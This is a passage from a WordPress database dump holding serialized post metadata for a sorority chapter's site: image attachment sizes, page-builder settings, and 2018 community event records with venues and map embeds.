:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:0:{}}i:1;a:2:{s:4:\"size\";i:6;s:8:\"elements\";a:1:{i:0;a:1:{s:4:\"type\";s:5:\"empty\";}}}i:2;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:0:{}}}}}'),(5269,1309,'ts_article_views','101'),(5272,1332,'_wp_attached_file','2018/09/VoterRegistration_Calendar.png'),(5273,1332,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:38:\"2018/09/VoterRegistration_Calendar.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"VoterRegistration_Calendar-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:38:\"VoterRegistration_Calendar-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5274,1333,'_wp_attached_file','2018/09/VoterRegistrationDrive.png'),(5275,1333,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:816;s:6:\"height\";i:1056;s:4:\"file\";s:34:\"2018/09/VoterRegistrationDrive.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"VoterRegistrationDrive-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"VoterRegistrationDrive-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"VoterRegistrationDrive-768x994.png\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"VoterRegistrationDrive-791x1024.png\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"VoterRegistrationDrive-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:34:\"VoterRegistrationDrive-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:34:\"VoterRegistrationDrive-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:34:\"VoterRegistrationDrive-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5276,1331,'ts_template','a:0:{}'),(5277,1331,'event','a:13:{s:3:\"day\";s:10:\"2018-10-06\";s:10:\"start-time\";s:7:\"12:00pm\";s:8:\"end-time\";s:6:\"2:00pm\";s:19:\"event-enable-repeat\";s:1:\"n\";s:9:\"event-end\";s:10:\"2018-10-06\";s:12:\"event-repeat\";s:1:\"1\";s:5:\"theme\";s:0:\"\";s:6:\"person\";s:25:\"socialaction@zphiblgz.org\";s:3:\"map\";s:363:\"<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3092.471377976388!2d-76.84469414978184!3d39.186736637342776!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7de31444b7ab9%3A0x89b4dbfbb6350a49!2sOwen+Brown+Village+Center!5e0!3m2!1sen!2sae!4v1537973358269\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen></iframe>\";s:9:\"free-paid\";s:4:\"free\";s:10:\"ticket-url\";s:0:\"\";s:5:\"price\";s:0:\"\";s:5:\"venue\";s:66:\"Owen Brown Village Center 7200 Cradle Rock Way, Columbia, MD 21045\";}'),(5278,1331,'day','1538784000'),(5279,1331,'_yoast_wpseo_content_score','60'),(5280,1331,'_yoast_wpseo_primary_event_categories','70'),(5281,1331,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(5282,1331,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(5283,1331,'page_settings',NULL),(5284,1331,'post_settings',NULL),(5285,1331,'ts_article_views','91'),(5289,1331,'_thumbnail_id','1332'),(5290,1338,'_edit_lock','1543585384:1'),(5291,1338,'_edit_last','1'),(5292,1339,'_wp_attached_file','2018/11/Joy-Drive-ZHOPE-1.png'),(5293,1339,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:816;s:6:\"height\";i:1056;s:4:\"file\";s:29:\"2018/11/Joy-Drive-ZHOPE-1.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Joy-Drive-ZHOPE-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Joy-Drive-ZHOPE-1-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Joy-Drive-ZHOPE-1-768x994.png\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Joy-Drive-ZHOPE-1-791x1024.png\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Joy-Drive-ZHOPE-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:29:\"Joy-Drive-ZHOPE-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:29:\"Joy-Drive-ZHOPE-1-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:29:\"Joy-Drive-ZHOPE-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5294,1340,'_wp_attached_file','2018/11/Joydrive_Calendar.png'),(5295,1340,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:29:\"2018/11/Joydrive_Calendar.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Joydrive_Calendar-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:29:\"Joydrive_Calendar-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5296,1341,'_wp_attached_file','2018/11/SpiritNight_CalendarImage.png'),(5297,1341,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:37:\"2018/11/SpiritNight_CalendarImage.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"SpiritNight_CalendarImage-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:37:\"SpiritNight_CalendarImage-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5298,1342,'_wp_attached_file','2018/11/Chicfila_SpiritNight.png'),(5299,1342,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:816;s:6:\"height\";i:1056;s:4:\"file\";s:32:\"2018/11/Chicfila_SpiritNight.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Chicfila_SpiritNight-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Chicfila_SpiritNight-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"Chicfila_SpiritNight-768x994.png\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"Chicfila_SpiritNight-791x1024.png\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"Chicfila_SpiritNight-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:32:\"Chicfila_SpiritNight-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:32:\"Chicfila_SpiritNight-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:32:\"Chicfila_SpiritNight-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5300,1342,'_wp_attachment_image_alt','Chicfila_SpiritNight'),(5301,1338,'ts_template','a:0:{}'),(5302,1338,'_thumbnail_id','1341'),(5303,1338,'event','a:13:{s:3:\"day\";s:10:\"2018-11-14\";s:10:\"start-time\";s:6:\"5:00pm\";s:8:\"end-time\";s:6:\"9:00pm\";s:19:\"event-enable-repeat\";s:1:\"n\";s:9:\"event-end\";s:17:\"November 14, 2018\";s:12:\"event-repeat\";s:1:\"1\";s:5:\"theme\";s:0:\"\";s:6:\"person\";s:18:\"zhope@zphiblgz.org\";s:3:\"map\";s:348:\"<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3091.991130772517!2d-76.82072094965629!3d39.19765027942495!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7e07a41404ecf%3A0xf2a1f83f474d217d!2sChick-fil-A!5e0!3m2!1sen!2sae!4v1541266541118\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen></iframe>\";s:9:\"free-paid\";s:4:\"free\";s:10:\"ticket-url\";s:0:\"\";s:5:\"price\";s:0:\"\";s:5:\"venue\";s:12:\"Chick-Fil-A \";}'),(5304,1338,'day','1542153600'),(5305,1338,'_yoast_wpseo_content_score','90'),(5306,1338,'_yoast_wpseo_primary_event_categories',''),(5307,1338,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(5308,1338,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(5309,1338,'page_settings',NULL),(5310,1338,'post_settings',NULL),(5311,1338,'ts_article_views','11'),(5312,1344,'_edit_lock','1543585367:1'),(5313,1344,'_edit_last','1'),(5314,1344,'ts_template','a:0:{}'),(5315,1344,'_thumbnail_id','1340'),(5316,1344,'event','a:13:{s:3:\"day\";s:16:\"November 1, 2018\";s:10:\"start-time\";s:0:\"\";s:8:\"end-time\";s:0:\"\";s:19:\"event-enable-repeat\";s:1:\"n\";s:9:\"event-end\";s:17:\"December 15, 2018\";s:12:\"event-repeat\";s:1:\"1\";s:5:\"theme\";s:0:\"\";s:6:\"person\";s:18:\"zhope@zphiblgz.org\";s:3:\"map\";s:0:\"\";s:9:\"free-paid\";s:4:\"free\";s:10:\"ticket-url\";s:0:\"\";s:5:\"price\";s:0:\"\";s:5:\"venue\";s:0:\"\";}'),(5317,1344,'day','1541030400'),(5318,1344,'_yoast_wpseo_content_score','90'),(5319,1344,'_yoast_wpseo_primary_event_categories',''),(5320,1344,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(5321,1344,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(5322,1344,'page_settings',NULL),(5323,1344,'post_settings',NULL),(5324,1344,'ts_article_views','48'),(5325,493,'_wp_old_date','2018-12-01'),(5326,1349,'_wp_attached_file','2018/12/ConwayBanner.png'),(5327,1349,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:300;s:4:\"file\";s:24:\"2018/12/ConwayBanner.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"ConwayBanner-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"ConwayBanner-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"ConwayBanner-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"ConwayBanner-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"ConwayBanner-600x300.png\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"ConwayBanner-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5353,1364,'_wp_attached_file','2020/01/IMG_2523-1.jpg'),(5354,1364,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:426;s:6:\"height\";i:559;s:4:\"file\";s:22:\"2020/01/IMG_2523-1.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"IMG_2523-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"IMG_2523-1-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"IMG_2523-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"IMG_2523-1-426x300.jpg\";s:5:\"width\";i:426;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"IMG_2523-1-426x300.jpg\";s:5:\"width\";i:426;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"IMG_2523-1-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 70D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1542465668\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5355,1365,'_wp_attached_file','2020/01/IMG_0733.jpg'),(5356,1365,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:477;s:4:\"file\";s:20:\"2020/01/IMG_0733.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0733-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0733-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0733-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"IMG_0733-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"IMG_0733-640x300.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0733-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D810\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573872928\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:6:\"0.0004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5341,1358,'_wp_attached_file','2020/01/IMG_0731-2.jpg'),(5342,1358,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:197;s:4:\"file\";s:22:\"2020/01/IMG_0731-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"IMG_0731-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"IMG_0731-2-300x92.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:92;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"IMG_0731-2-400x197.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"IMG_0731-2-450x197.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"IMG_0731-2-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D810\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573870912\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5360,1367,'_wp_attached_file','2020/01/IMG_0727.jpg'),(5361,1367,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2020/01/IMG_0727.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0727-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0727-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0727-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"IMG_0727-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"IMG_0727-512x300.jpg\";s:5:\"width\";i:512;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0727-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1579378480\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5345,1360,'_wp_attached_file','2020/01/Webp.net-resizeimage.jpg'),(5346,1360,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:650;s:4:\"file\";s:32:\"2020/01/Webp.net-resizeimage.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Webp.net-resizeimage-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Webp.net-resizeimage-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"Webp.net-resizeimage-768x260.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"Webp.net-resizeimage-1024x347.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"Webp.net-resizeimage-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:32:\"Webp.net-resizeimage-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:32:\"Webp.net-resizeimage-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:32:\"Webp.net-resizeimage-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5374,1370,'_wp_attached_file','2020/01/APPA2020.png'),(5375,1370,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:494;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2020/01/APPA2020.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"APPA2020-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"APPA2020-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"APPA2020-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"m